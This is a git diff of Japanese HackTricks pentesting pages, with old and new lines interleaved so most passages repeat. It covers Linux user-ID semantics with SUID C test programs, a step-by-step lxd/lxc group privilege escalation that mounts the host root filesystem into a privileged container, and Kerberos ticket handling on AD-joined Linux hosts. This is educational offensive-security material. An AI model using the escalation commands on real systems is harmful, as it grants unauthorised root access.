* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**にフォローしてください。**
* **[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう。
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
### ユーザー識別変数
- **`ruid`**: **実ユーザーID**はプロセスを開始したユーザーを示します。
- **`euid`**: **有効ユーザーID**として知られ、システムがプロセスの権限を判断するために使用するユーザーのアイデンティティを表します。通常、`euid`は`ruid`を反映していますが、SetUIDバイナリの実行のような場合には、`euid`はファイル所有者のアイデンティティを引き継ぎ、特定の操作権限を付与します。
- **`suid`**: **保存されたユーザーID**は、高権限プロセス通常はrootとして実行されるが一時的に権限を放棄して特定のタスクを実行し、後で元の高いステータスを再取得する必要がある場合に重要です。
- **`ruid`**: **実ユーザーID**はプロセスを開始したユーザーを示します。
- **`euid`**: **有効ユーザーID**として知られ、システムがプロセス特権を確定するために使用するユーザーIDを表します。一般的には、`euid`は`ruid`と同じであり、SetUIDバイナリの実行などの場合を除いて、`euid`はファイル所有者のIDを取り、特定の操作権限を付与します。
- **`suid`**: この**保存されたユーザーID**は、高特権プロセス通常はrootとして実行が一時的に特定のタスクを実行するために特権を一時的に放棄する必要がある場合に重要です。後で元の昇格された状態を取り戻します。
#### 重要な注意
root以外で動作するプロセスは、`euid`を現在の`ruid`、`euid`、または`suid`に一致させることしかできません
#### 重要な注意事項
rootで動作していないプロセスは、現在の`ruid`、`euid`、または`suid`に一致するように`euid`を変更できます
### set*uid関数の理解
- **`setuid`**: 最初の仮定とは異なり、`setuid`は主に`ruid`ではなく`euid`を変更します。特に、特権プロセスの場合、指定されたユーザー通常はrootに`ruid`、`euid`、`suid`を合わせ、`suid`の上書きによりこれらのIDを固定します。詳細は[setuid man page](https://man7.org/linux/man-pages/man2/setuid.2.html)で見ることができます。
- **`setreuid`****`setresuid`**: これらの関数は、`ruid`、`euid`、`suid`の微調整を可能にします。ただし、その機能はプロセスの権レベルに依存しています。非rootプロセスの場合、変更は現在の`ruid`、`euid`、`suid`の値に制限されます。対照的に、rootプロセスまたは`CAP_SETUID`機能を持つプロセスは、これらのIDに任意の値を割り当てることができます。詳細は[setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html)と[setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html)で得られます。
- **`setuid`**: 最初の仮定とは異なり、`setuid`は主に`ruid`ではなく`euid`を変更します。特権プロセスの場合、`setuid`は`ruid`、`euid`、および`suid`を指定されたユーザー通常はrootと一致させ、これらのIDを効果的に固定します。詳細な情報は[setuid man page](https://man7.org/linux/man-pages/man2/setuid.2.html)にあります。
- **`setreuid`**および**`setresuid`**: これらの関数は`ruid`、`euid`、および`suid`を微調整することを可能にします。ただし、その機能はプロセスの権レベルに依存します。rootプロセスまたは`CAP_SETUID`機能を持つプロセスは、これらのIDに任意の値を割り当てることができます。詳細は[setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html)および[setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html)から得ることができます。
これらの機能はセキュリティメカニズムとしてではなく、プログラムがその有効ユーザーIDを変更して別のユーザーのアイデンティティを採用するなど、意図した操作フローを容易にするために設計されています。
これらの機能はセキュリティメカニズムではなく、プログラムが他のユーザーのIDを採用する際など、意図した操作フローを容易にするために設計されています。
特に、`setuid`はすべてのIDをrootに合わせるため、rootへの権限昇格によく使用されますが、さまざまなシナリオでユーザーIDの動作を理解し操作するためには、これらの関数の違いを区別することが重要です。
`setuid`はrootへの特権昇格に一般的に使用されるかもしれませんが、これらの関数の違いを区別することは、さまざまなシナリオでユーザーIDの動作を理解し操作するために重要です。
### Linuxでのプログラム実行メカニズム
#### **`execve` システムコール**
- **機能**: `execve`、最初の引数で指定されたプログラムを開始します。引数用の`argv`配列と環境用の`envp`配列の2つの配列引数を取ります。
- **動作**: 呼び出し元のメモリ空間を保持しますが、スタック、ヒープ、データセグメントを新しくします。プログラムのコードは新しいプログラムに置き換えられます。
#### **`execve`システムコール**
- **機能**: `execve`最初の引数で決定されたプログラムを開始します。`argv`は引数用、`envp`は環境用の2つの配列引数を取ります。
- **動作**: 呼び出し元のメモリ空間を保持しますが、スタック、ヒープ、およびデータセグメントをリフレッシュします。プログラムのコードは新しいプログラムに置き換えられます。
- **ユーザーIDの保持**:
- `ruid`、`euid`、および補助グループIDは変更されません。
- 新しいプログラムにSetUIDビットが設定されている場合、`euid`に微妙な変更があるかもしれません
- 新しいプログラムがSetUIDビットを持つ場合、`euid`に微妙な変更が加えられる可能性があります
- 実行後、`suid`は`euid`から更新されます。
- **ドキュメント**: 詳細は[`execve` man page](https://man7.org/linux/man-pages/man2/execve.2.html)で見ることができます。
- **ドキュメント**: 詳細な情報は[`execve` man page](https://man7.org/linux/man-pages/man2/execve.2.html)にあります。
#### **`system` 関数**
#### **`system`関数**
- **機能**: `execve`とは異なり、`system`は`fork`を使用して子プロセスを作成し、その子プロセス内で`execl`を使用してコマンドを実行します。
- **コマンド実行**: `execl("/bin/sh", "sh", "-c", command, (char *) NULL);`を使用して`sh`経由でコマンドを実行します。
- **動作**: `execl`は`execve`の一形態であるため、新しい子プロセスのコンテキストで同様に動作します。
- **ドキュメント**: さらなる洞察は[`system` man page](https://man7.org/linux/man-pages/man3/system.3.html)から得られます。
- **コマンド実行**: `execl("/bin/sh", "sh", "-c", command, (char *) NULL);`を使用して`sh`を介してコマンドを実行します。
- **動作**: `execl`は`execve`の形式であり、新しい子プロセスのコンテキストで同様に動作します。
- **ドキュメント**: [`system` man page](https://man7.org/linux/man-pages/man3/system.3.html)からさらなる洞察を得ることができます。
#### **SUIDを持つ`bash`と`sh`の動作**
#### **SUIDでの`bash`と`sh`の動作**
- **`bash`**:
- `euid`と`ruid`の扱いに影響を与える`-p`オプションがあります。
- `-p`なしでは、初期に`euid`と`ruid`が異なる場合、`bash`は`euid`を`ruid`に設定します。
- `-p`ありでは、初期の`euid`が保持されます。
- 詳細は[`bash` man page](https://linux.die.net/man/1/bash)で見ることができます。
- `-p`オプションが`euid`と`ruid`の扱いに影響を与えます。
- `-p`なしでは、`bash`は最初に異なる場合に`euid`を`ruid`に設定します。
- `-p`を使用すると、初期の`euid`が保持されます。
- 詳細は[`bash` man page](https://linux.die.net/man/1/bash)で確認できます。
- **`sh`**:
- `bash`の`-p`に類似したメカニズムは持っていません。
- ユーザーIDに関する動作は、`euid`と`ruid`の等価性の保持を強調する`-i`オプションの下でのみ明示的に言及されています。
- 追加情報は[`sh` man page](https://man7.org/linux/man-pages/man1/sh.1p.html)で利用可能です。
- `bash`の`-p`に類似したメカニズムはありません。
- ユーザーIDに関する動作は明示的には述べられておらず、`-i`オプションの下でのみ、`euid`と`ruid`の等しさの保持が強調されています。
- 追加情報は[`sh` man page](https://man7.org/linux/man-pages/man1/sh.1p.html)で入手できます。
これらのメカニズムは、それぞれが異なる操作を提供し、プログラム間の実行と移行のための多様な選択肢を提供し、ユーザーIDがどのように管理され、保持されるかに特定のニュアンスがあります。
これらのメカニズムは、操作方法において異なるため、プログラムの実行とプログラム間の移行の幅広いオプションを提供し、ユーザーIDの管理と保持方法に特定の微妙な違いがあります。
### 実行におけるユーザーIDの動作のテスト
### 実行中のユーザーIDの動作をテストする
以下の例はhttps://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jailから取られており、さらなる情報についてはそちらをチェックしてください。
詳細については、https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail から取得した例を参照してください。
#### ケース1: `setuid`を`system`と組み合わせて使用する
#### ケース1: `system`と`bash`を`sh`として使用する`setuid`の効果
**目的**: `setuid`を`system`および`sh`としての`bash`と組み合わせた場合の効果を理解する。
**目的**: `setuid`を`system`と`bash`を`sh`として組み合わせて使用した場合の効果を理解する。
**Cコード**:
```c
@ -92,14 +92,14 @@ uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconf
```
**分析:**
* `ruid``euid` はそれぞれ99nobodyと1000frankから始まります。
* `setuid` は両方を1000に合わせます。
* `system`shからbashへのシンボリックリンクのため、`/bin/bash -c id` を実行します。
* `-p` なしの `bash` `euid``ruid` に合わせるため、両方とも99nobodyになります。
* `ruid``euid`最初にそれぞれ99nobodyと1000frankから始まります。
* `setuid` は両方を1000に揃えます。
* `system`、shからbashへのシンボリックリンクにより `/bin/bash -c id` を実行します。
* `-p` なしの `bash`、`euid` を `ruid` に合わせて調整し、両方が99nobodyになります。
#### ケース2: setreuid と system を使用する
#### ケース2: setreuidをsystemと一緒に使用する
**C コード**:
**Cコード**:
```c
#define _GNU_SOURCE
#include <stdlib.h>
@ -115,18 +115,18 @@ return 0;
```bash
oxdf@hacky$ gcc b.c -o /mnt/nfsshare/b; chmod 4755 /mnt/nfsshare/b
```
**実行と結果**
**実行と結果:**
```bash
bash-4.2$ $ ./b
uid=1000(frank) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0
```
**分析:**
* `setreuid` は ruid と euid の両方を 1000 に設定します。
* `system` は bash を呼び出し、ユーザー ID が等しいため、frank として効果的に操作します。
* `setreuid` は ruid と euid を両方とも 1000 に設定します。
* `system` は bash を呼び出し、ユーザー ID を等しく保持するため、実質的に frank として動作します。
#### ケース 3: execve での setuid の使用
目的: setuid と execve の相互作用を探る
#### ケース 3: execve と setuid の相互作用の探索
目的: setuid と execve の相互作用を調査します
```bash
#define _GNU_SOURCE
#include <stdlib.h>
@ -138,16 +138,16 @@ execve("/usr/bin/id", NULL, NULL);
return 0;
}
```
**実行と結果**
**実行と結果:**
```bash
bash-4.2$ $ ./c
uid=99(nobody) gid=99(nobody) euid=1000(frank) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0
```
**分析:**
* `ruid` は99のままですが、euidはsetuidの効果に従って1000に設定されます。
* `ruid` は99のままですが、euid は1000に設定され、setuid の効果と一致しています。
**C言語の例 2 (Bashの呼び出し):**
**Cコード例2Bashの呼び出し:**
```bash
#define _GNU_SOURCE
#include <stdlib.h>
@ -159,7 +159,7 @@ execve("/bin/bash", NULL, NULL);
return 0;
}
```
**実行と結果**
**実行と結果:**
```bash
bash-4.2$ $ ./d
bash-4.2$ $ id
@ -167,9 +167,9 @@ uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconf
```
**分析:**
* `setuid`によって`euid`は1000に設定されますが、`-p`がないため、`bash`は`euid`を`ruid`(99)にリセットします。
* `euid` は `setuid` によって1000に設定されていますが、`-p` がないため、`bash` は `ruid` (99) に euid をリセットします。
**Cのコード例 3 (`bash -p`を使用する場合):**
**Cコード例3 (bash -p を使用):**
```bash
#define _GNU_SOURCE
#include <stdlib.h>
@ -182,7 +182,7 @@ execve(paramList[0], paramList, NULL);
return 0;
}
```
**実行と結果**
**実行と結果:**
```bash
bash-4.2$ $ ./e
bash-4.2$ $ id
@ -196,10 +196,10 @@ uid=99(nobody) gid=99(nobody) euid=100
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか?**HackTricksにあなたの会社を広告したいですか** または、**最新版のPEASSを入手**したり、**HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**に**フォローしてください。**
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

120
linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
View file

@ -1,24 +1,26 @@
# lxd/lxcグループ - 特権昇格
# lxd/lxc グループ - 特権昇格
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**</strong>**ゼロからヒーローまでAWSハッキングを学ぶ**</a><strong>!</strong></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする**
* **ハッキングトリックを共有する**には、[**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出してください。
</details>
もし _**lxd**_ **または** _**lxc**_ **グループに所属している場合、rootになることができます**
もし _**lxd**_ **または** _**lxc**_ **グループに所属している場合、root 権限を取得できます**
## インターネットなしでの攻撃
## インターネットなしでの悪用
### 方法1
このディストロビルダーをマシンにインストールすることができます: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(githubの指示に従ってください):
あなたのマシンにこのディストロビルダーをインストールすることができます: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder) (githubの手順に従ってください):
```bash
sudo su
#Install requirements
@ -36,78 +38,27 @@ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
```
次に、脆弱なサーバーに **lxd.tar.xz****rootfs.squashfs** のファイルをアップロードします。
イメージを追加します:
**lxd.tar.xz** と **rootfs.squashfs** ファイルをアップロードし、イメージをリポジトリに追加してコンテナを作成してください:
```bash
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
```
# LXD Privilege Escalation
## Introduction
# Check the image is there
lxc image list
This document explains a privilege escalation technique in LXD, a container hypervisor for Linux systems. By exploiting misconfigurations in LXD, an attacker can gain root privileges within a container and potentially escalate their privileges on the host system.
## Prerequisites
To perform this attack, you need the following:
- Access to a Linux system with LXD installed.
- Basic knowledge of Linux command-line interface (CLI) and LXD commands.
## Attack Scenario
1. **Create a Container**: First, create a new container using the LXD command-line tool. Specify the desired Linux distribution and version for the container.
```bash
lxc launch <image> <container-name>
```
2. **Add Root Path**: Once the container is created, add the root path to the container's configuration. This will allow the container to access the host system's root filesystem.
```bash
lxc config device add <container-name> root disk source=/ path=/
```
This command adds a new device named "root" to the container's configuration, with the source set to the host system's root filesystem ("/") and the path set to the root directory ("/") within the container.
3. **Start the Container**: Start the container to apply the changes made to its configuration.
```bash
lxc start <container-name>
```
4. **Access the Container**: Once the container is running, access its shell using the LXD command-line tool.
```bash
lxc exec <container-name> -- /bin/bash
```
5. **Privilege Escalation**: Within the container's shell, execute commands to escalate privileges and gain root access. This can be achieved by exploiting vulnerabilities or misconfigurations within the container or the host system.
## Mitigation
To prevent privilege escalation attacks in LXD, follow these best practices:
- Regularly update LXD and the host system to ensure that security patches are applied.
- Limit the privileges of LXD containers by using appropriate Linux user namespaces and resource restrictions.
- Avoid adding the root path to containers unless absolutely necessary, and carefully review the security implications before doing so.
- Implement strong access controls and monitor container activity for any suspicious behavior.
By following these guidelines, you can reduce the risk of privilege escalation attacks in LXD containers.
```bash
# Create the container
lxc init alpine privesc -c security.privileged=true
lxc list #List containers
# List containers
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```
{% hint style="danger" %}
もしエラーが発生した場合 _**エラー: ストレージプールが見つかりません。新しいストレージプールを作成してください**_\
**`lxd init`** を実行し、前のコマンドチャンクを**繰り返して**ください
このエラーが見つかった場合 _**Error: No storage pool found. Please create a new storage pool**_\
**`lxd init`** を実行して、前のコマンドチャンクを**繰り返して**ください
{% endhint %}
コンテナを実行します:
最後に、コンテナを実行して root 権限を取得できます:
```bash
lxc start privesc
lxc exec privesc /bin/sh
@ -115,7 +66,7 @@ lxc exec privesc /bin/sh
```
### 方法2
Alpineイメージをビルドし、フラグ`security.privileged=true`を使用して起動します。これにより、コンテナがホストファイルシステムとしてrootとして対話するように強制されます。
Alpineイメージをビルドし、`security.privileged=true`フラグを使用して起動します。これにより、コンテナがホストファイルシステムとしてrootとして対話するように強制されます。
```bash
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
@ -139,11 +90,9 @@ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursiv
lxc start mycontainer
lxc exec mycontainer /bin/sh
```
Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)
## インターネットを使用する
## インターネットを使用する場合
[こちらの手順](https://reboare.github.io/lxd/lxd-escape.html)に従うことができます。
[これらの手順](https://reboare.github.io/lxd/lxd-escape.html)に従うことができます。
```bash
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
@ -151,18 +100,21 @@ lxc start test
lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
## その他の参考資料
## 参考文献
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}
* [https://reboare.github.io/lxd/lxd-escape.html](https://reboare.github.io/lxd/lxd-escape.html)
* [https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/](https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
* **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする
* **ハッキングテクニックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>

115
linux-hardening/privilege-escalation/linux-active-directory.md
View file

@ -4,25 +4,25 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* サイバーセキュリティ会社で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
Linuxマシンは、Active Directory環境内に存在する場合もあります。
Active Directory環境内にLinuxマシンが存在する可能性があります。
AD内のLinuxマシンでは、**さまざまなCCACHEチケットがファイル内に保存されている可能性があります。これらのチケットは、他のKerberosチケットと同様に使用および悪用することができます**。これらのチケットを読むには、チケットの所有者であるユーザーまたは**マシン内のroot**である必要があります。
AD内のLinuxマシンでは、**異なるCCACHEチケットがファイル内に保存されている場合があります。これらのチケットは他のKerberosチケットと同様に使用および悪用できます**。これらのチケットを読み取るには、チケットの所有者であるユーザーまたは**マシン内のroot**である必要があります。
## 列挙
### LinuxからのAD列挙
LinuxまたはWindowsのbashでADにアクセスできる場合、ADを列挙するために[https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn)を試すことができます。
LinuxまたはWindowsのbashでADにアクセスできる場合、[https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn)を使用してADを列挙できます。
LinuxからADを列挙する**他の方法**については、次のページをチェックしてください:
**LinuxからADを列挙する他の方法**を学ぶには、次のページをチェックしてください:
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
@ -30,117 +30,100 @@ LinuxからADを列挙する**他の方法**については、次のページを
### FreeIPA
これは、主に**Unix**環境の統合管理ソリューションとして使用される、Microsoft Windows **Active** **Directory**のオープンソースの**代替**です。詳細については、次のページを参照してください:
FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory**のオープンソース**代替**です。完全な**LDAPディレクトリ**と、Active Directoryに似た管理のためのMIT **Kerberos** Key Distribution Centerを組み合わせています。CARA証明書管理のためのDogtag **Certificate System**を利用し、スマートカードを含む**マルチファクタ**認証をサポートしています。Unix認証プロセスにはSSSDが統合されています。詳細については以下を参照してください:
{% content-ref url="../freeipa-pentesting.md" %}
[freeipa-pentesting.md](../freeipa-pentesting.md)
{% endcontent-ref %}
## チケット操作
## チケット操作
### パス・ザ・チケット
このページでは、Linuxホスト内のさまざまな場所で**Kerberosチケットを見つける**ことができます。次のページでは、これらのCCacheチケット形式をKirbi形式Windowsで使用する形式に変換する方法や、PTT攻撃を実行する方法について学ぶことができます
このページでは、Linuxホスト内で**kerberosチケットを見つける可能性のあるさまざまな場所**を見つけることができます。次のページでは、これらのCCacheチケット形式をWindowsで使用する必要があるKirbi形式に変換する方法や、PTT攻撃を実行する方法について学ぶことができます
